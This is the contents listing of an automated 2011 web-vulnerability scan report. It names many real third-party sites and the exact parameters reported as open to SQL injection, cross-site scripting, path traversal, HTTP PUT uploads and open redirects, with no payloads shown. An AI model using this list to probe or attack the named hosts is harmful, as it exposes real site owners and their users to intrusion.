DORK Report for May 2, 2011, Vulnerable Hosts, GHDB, XSS, SQL Injection, HTTP PUT

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon May 02 10:53:10 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [zs parameter]

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]

1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

2. ASP.NET tracing enabled

3. File path traversal

3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

4. LDAP injection

4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

5. HTTP PUT enabled

5.1. http://www.onlinemicrofiche.com/favicon.ico

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

6. HTTP header injection

6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

7. Cross-site scripting (reflected)

7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

7.26. http://hit.blvdstatus.com/t [tid parameter]

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

7.36. http://usjobsresource.com/3 [s parameter]

7.37. http://usjobsresource.com/3/ [s parameter]

7.38. http://widgets.digg.com/buttons/count [url parameter]

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]

8. Flash cross-domain policy

8.1. http://0.gravatar.com/crossdomain.xml

8.2. http://1.gravatar.com/crossdomain.xml

8.3. http://ad.doubleclick.net/crossdomain.xml

8.4. http://ad.turn.com/crossdomain.xml

8.5. http://admeld.adnxs.com/crossdomain.xml

8.6. http://admonkey.dapper.net/crossdomain.xml

8.7. http://ajax.googleapis.com/crossdomain.xml

8.8. http://b.scorecardresearch.com/crossdomain.xml

8.9. http://bh.contextweb.com/crossdomain.xml

8.10. http://bs.serving-sys.com/crossdomain.xml

8.11. http://c.atdmt.com/crossdomain.xml

8.12. http://cdn.turn.com/crossdomain.xml

8.13. http://d1.openx.org/crossdomain.xml

8.14. http://dg.specificclick.net/crossdomain.xml

8.15. http://ds.serving-sys.com/crossdomain.xml

8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml

8.17. http://ib.adnxs.com/crossdomain.xml

8.18. http://l.yimg.com/crossdomain.xml

8.19. http://loadm.exelator.com/crossdomain.xml

8.20. http://loadus.exelator.com/crossdomain.xml

8.21. http://log30.doubleverify.com/crossdomain.xml

8.22. http://map.media6degrees.com/crossdomain.xml

8.23. http://metrics.washingtonpost.com/crossdomain.xml

8.24. http://n4403ad.doubleclick.net/crossdomain.xml

8.25. http://pix01.revsci.net/crossdomain.xml

8.26. http://pixel.invitemedia.com/crossdomain.xml

8.27. http://pixel.quantserve.com/crossdomain.xml

8.28. http://r.turn.com/crossdomain.xml

8.29. http://resources.infolinks.com/crossdomain.xml

8.30. http://s0.2mdn.net/crossdomain.xml

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml

8.32. http://t.mookie1.com/crossdomain.xml

8.33. http://tags.bluekai.com/crossdomain.xml

8.34. http://usjobsresource.com/crossdomain.xml

8.35. http://va.px.invitemedia.com/crossdomain.xml

8.36. http://view.atdmt.com/crossdomain.xml

8.37. http://www.4tubehd.com/crossdomain.xml

8.38. http://www.aces.edu/crossdomain.xml

8.39. http://www.architecturaldigest.com/crossdomain.xml

8.40. http://www.babesandstars.com/crossdomain.xml

8.41. http://www.bakugandimensions.com/crossdomain.xml

8.42. http://www.banner.kiev.ua/crossdomain.xml

8.43. http://www.bigrebelgames.com/crossdomain.xml

8.44. http://www.bonhams.com/crossdomain.xml

8.45. http://www.cbs8.com/crossdomain.xml

8.46. http://www.express.co.uk/crossdomain.xml

8.47. http://www.foxytube.com/crossdomain.xml

8.48. http://www.freemooviesonline.com/crossdomain.xml

8.49. http://www.fulltiltpoker.net/crossdomain.xml

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

8.51. http://www.healthination.com/crossdomain.xml

8.52. http://www.hyperlaunch.com/crossdomain.xml

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

8.54. http://www.journalstandard.com/crossdomain.xml

8.55. http://www.ksrevenue.org/crossdomain.xml

8.56. http://www.mountaindew.com/crossdomain.xml

8.57. http://www.muschealth.com/crossdomain.xml

8.58. http://www.outdoorjp.com/crossdomain.xml

8.59. http://www.partyamerica.com/crossdomain.xml

8.60. http://www.pisamba.com/crossdomain.xml

8.61. http://www.thebeatles.com/crossdomain.xml

8.62. http://www.thefordstory.com/crossdomain.xml

8.63. http://www.thehothits.com/crossdomain.xml

8.64. http://www.trilulilu.ro/crossdomain.xml

8.65. http://www.tutorialized.com/crossdomain.xml

8.66. http://www.virtual-hairstyles.com/crossdomain.xml

8.67. http://www.weddings.com/crossdomain.xml

8.68. http://www.wmms.com/crossdomain.xml

8.69. http://www.wsfa.com/crossdomain.xml

8.70. http://www.wtoc.com/crossdomain.xml

8.71. http://adadvisor.net/crossdomain.xml

8.72. http://ads-vrx.adbrite.com/crossdomain.xml

8.73. http://ads.adbrite.com/crossdomain.xml

8.74. http://ads2.adbrite.com/crossdomain.xml

8.75. http://adx.g.doubleclick.net/crossdomain.xml

8.76. http://cookex.amp.yahoo.com/crossdomain.xml

8.77. http://csct.att.com/crossdomain.xml

8.78. http://d.chango.com/crossdomain.xml

8.79. http://geo.yahoo.com/crossdomain.xml

8.80. http://googleads.g.doubleclick.net/crossdomain.xml

8.81. http://media.washingtonpost.com/crossdomain.xml

8.82. http://news.yahoo.com/crossdomain.xml

8.83. http://online.wsj.com/crossdomain.xml

8.84. http://pagead2.googlesyndication.com/crossdomain.xml

8.85. http://pubads.g.doubleclick.net/crossdomain.xml

8.86. http://s28.sitemeter.com/crossdomain.xml

8.87. http://static.ak.facebook.com/crossdomain.xml

8.88. http://tomopop.com/crossdomain.xml

8.89. http://www.admez.com/crossdomain.xml

8.90. http://www.anilinkz.com/crossdomain.xml

8.91. http://www.awltovhc.com/crossdomain.xml

8.92. http://www.bingo.com/crossdomain.xml

8.93. http://www.chrisbrownworld.com/crossdomain.xml

8.94. http://www.cosmeticscop.com/crossdomain.xml

8.95. http://www.dotmed.com/crossdomain.xml

8.96. http://www.facebook.com/crossdomain.xml

8.97. http://www.ftjcfx.com/crossdomain.xml

8.98. http://www.kens5.com/crossdomain.xml

8.99. http://www.lavalife.com/crossdomain.xml

8.100. http://www.lduhtrp.net/crossdomain.xml

8.101. http://www.mihomepaper.com/crossdomain.xml

8.102. http://www.mynews.in/crossdomain.xml

8.103. http://www.nextworth.com/crossdomain.xml

8.104. http://www.swarminteractive.com/crossdomain.xml

8.105. http://www.toyotacertified.com/crossdomain.xml

8.106. http://www.tqlkg.com/crossdomain.xml

8.107. http://www.villagehatshop.com/crossdomain.xml

8.108. http://www.washingtonpost.com/crossdomain.xml

8.109. http://www.whymilk.com/crossdomain.xml

8.110. http://www.wpsdlocal6.com/crossdomain.xml

8.111. http://www.wretch.cc/crossdomain.xml

8.112. http://www.youneek.com/crossdomain.xml

8.113. http://www.argosy.edu/crossdomain.xml

8.114. http://www.babybottlepop.com/crossdomain.xml

8.115. http://www.bluesplayer.co.uk/crossdomain.xml

8.116. http://www.hotwheelscollectors.com/crossdomain.xml

8.117. http://www.mdconsult.com/crossdomain.xml

8.118. http://www.oshkoshbgosh.com/crossdomain.xml

8.119. http://www.ourmidland.com/crossdomain.xml

8.120. http://www.recordslogin.com/crossdomain.xml

8.121. http://www.reelseo.com/crossdomain.xml

8.122. http://www.slotocash.com/crossdomain.xml

8.123. http://www.solidworks.com/crossdomain.xml

8.124. http://www.undisciplined-subs.com/crossdomain.xml

8.125. http://www.uni.edu/crossdomain.xml

8.126. http://www.voiceofsandiego.org/crossdomain.xml

8.127. http://www.walthers.com/crossdomain.xml

9. Silverlight cross-domain policy

9.1. http://ad.doubleclick.net/clientaccesspolicy.xml

9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml

9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml

9.5. http://s0.2mdn.net/clientaccesspolicy.xml

9.6. http://view.atdmt.com/clientaccesspolicy.xml

10. Cleartext submission of password

10.1. http://insurancenewsnet.com/article.aspx

10.2. http://www.greenhulk.net/forums/login.php

10.3. http://www.greenhulk.net/forums/login.php

10.4. http://www.greenhulk.net/forums/register.php

10.5. http://www.greenhulk.net/forums/register.php

10.6. http://www.greenhulk.net/forums/showthread.php

10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

10.8. http://www.japanator.com/elephant/login.phtml

10.9. http://www.japanator.com/elephant/signup.phtml

10.10. http://www.mrsdash.com/favicon.ico

11. XML injection

11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]

11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]

11.6. http://translate.googleapis.com/translate_a/l [cb parameter]

11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]

11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]

11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]

11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]

11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]

11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]

11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]

11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]

11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]

11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]

12. SSL cookie without secure flag set

12.1. https://www.crankyape.com/member/registration.aspx

12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

13. Session token in URL

14. Password field submitted using GET method

15. Open redirection

15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]

15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]

15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]

15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]

15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]

15.9. http://pixel.rubiconproject.com/tap.php [next parameter]

15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

15.11. http://sync.mathtag.com/sync/img [redir parameter]

16. Cookie scoped to parent domain

16.1. http://t.mookie1.com/t/v1/event

16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

16.4. http://www.mylearningplan.com/favicon.ico

16.5. http://www.ptcb.org/favicon.ico

16.6. http://www.washingtonpost.com/wl/jobs/home

16.7. http://0.r.msn.com/

16.8. http://a.triggit.com/px

16.9. http://ab-m.d.chango.com/m/ab

16.10. http://ad.turn.com/server/pixel.htm

16.11. http://admeld.adnxs.com/usersync

16.12. http://ads.adbrite.com/adserver/behavioral-data/8201

16.13. http://ads.adbrite.com/adserver/behavioral-data/8204

16.14. http://ads.adbrite.com/adserver/vdi/682865

16.15. http://ads.adbrite.com/adserver/vdi/682865

16.16. http://ads.adbrite.com/adserver/vdi/684339

16.17. http://ads.adbrite.com/adserver/vdi/711384

16.18. http://ads.adbrite.com/adserver/vdi/762701

16.19. http://ads.adbrite.com/adserver/vdi/779045

16.20. http://ads.adbrite.com/adserver/vdi/806205

16.21. http://ads2.adbrite.com/v0/ad

16.22. http://ads2.adbrite.com/v0/ad

16.23. http://ads2.adbrite.com/v0/ad

16.24. http://b.scorecardresearch.com/b

16.25. http://bdv.bidvertiser.com/bidvertiser.dbm

16.26. http://bh.contextweb.com/bh/rtset

16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.28. http://c.bing.com/c.gif

16.29. http://c.statcounter.com/t.php

16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/

16.31. http://csc.beap.ad.yieldmanager.net/i

16.32. http://ib.adnxs.com/getuid

16.33. http://image2.pubmatic.com/AdServer/Pug

16.34. http://loadm.exelator.com/load/

16.35. http://loadus.exelator.com/load/

16.36. http://map.media6degrees.com/orbserv/hbpix

16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

16.39. http://pixel.invitemedia.com/data_sync

16.40. http://pixel.quantserve.com/pixel

16.41. http://pixel.rubiconproject.com/tap.php

16.42. http://r.turn.com/server/pixel.htm

16.43. http://segment-pixel.invitemedia.com/set_partner_uid

16.44. http://sync.mathtag.com/sync/img

16.45. http://tags.bluekai.com/site/2831

16.46. http://tags.bluekai.com/site/2893

16.47. http://tags.bluekai.com/site/3754

16.48. http://tags.bluekai.com/site/3945

16.49. http://um.simpli.fi/ab_match

16.50. http://user.lucidmedia.com/clicksense/user

16.51. http://va.px.invitemedia.com/goog_imp

16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

16.53. http://www.bing.com/

16.54. http://www.bing.com/HPImageArchive.aspx

16.55. http://www.bing.com/fd/fb/r

16.56. http://www.bing.com/fd/fb/u

16.57. http://www.bing.com/fd/ls/l

16.58. http://www.bing.com/scopePopupHandler.aspx

16.59. http://www.dirtrider.com/favicon.ico

16.60. http://www.greenhulk.net/forums/login.php

16.61. http://www.greenhulk.net/forums/register.php

16.62. http://www.kylotteryretailers.com/favicon.ico

16.63. http://www.schwabbankcreditcard.com/favicon.ico

17. Cookie without HttpOnly flag set

17.1. http://dg.specificclick.net/

